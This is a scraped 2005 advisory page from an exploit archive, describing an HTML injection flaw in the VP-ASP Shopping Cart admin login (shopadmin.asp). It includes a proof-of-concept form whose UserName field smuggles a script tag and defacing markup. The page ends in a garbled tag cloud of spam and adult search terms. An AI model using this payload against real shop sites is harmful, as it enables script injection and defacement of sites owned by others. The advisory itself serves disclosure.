about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , VP-ASP Shopping Cart Shopadmin.ASP HTML Injection Vulnerability


Title VP-ASP Shopping Cart Shopadmin.ASP HTML Injection Vulnerability
Published 2005-11-17-12:00AM
Updated 2005-11-17-10:42PM
Class Input Validation Error
CVE   CAN-2005-3685
Remote  Yes
Local  No
Credit  ConcorDHacK is credited with the discovery of this vulnerability.
Vulnerable  VPASP Shopping Cart
Not Vulnerable  
Code   No exploit is required.

Proof of concept code has been provided:

<TITLE>VP-ASP Shopping UserName HTML Injection Vulnerability</TITLE>
<form action=http://www.example.com/shopadmin.asp name=LoginForm method=POST>
<input type=hidden name=UserName value='"><script>alert("Vulnerable server!!!
By ConcorDHacK")</script>
<b><font color="red" size="10">Vulnerable server<br>By ConcorDHacK@gmail.com>
</font> </b>' /> <input type=hidden name=Password size="20" value="123"></td>
<input type=submit name="Login" value="GO ! GO !"><br><br><br>By ConcorDHacK<br>
<u>Email</u>: ConcorDHacK@gmail.com<br>
<a href="http://hackzord-security.fr.tc">www.hackzord-security.fr.tc</a>
</form>
</body>
</HTML>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Mon, 07 Dec 2009 12:08:32 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
guest book www.mqsy.n VULNERABIL 200 /compo sexe.good mambo Remo microsoft sexe.good phpBB 2 news for c mambo Remo t426t assmovies PHP-Nuke C 200 /compo news for c renata arr Fukgirks news for c Sexindian. Remote Fil Board Sendmail 8 200 /compo LIVE MESSE pure 18 www.12541. Sexphoto g java notes www.90175. Board www.xfailv Com Board 2.3. ...t/admi 200 /compo /include PHP 4.3.1 t81t Latinsex NET CAFE S CMS is Fre www.gxsw.n Video six 200 /compo www.bjdabx TRISHA SEX www.chijun potno PAKISTANI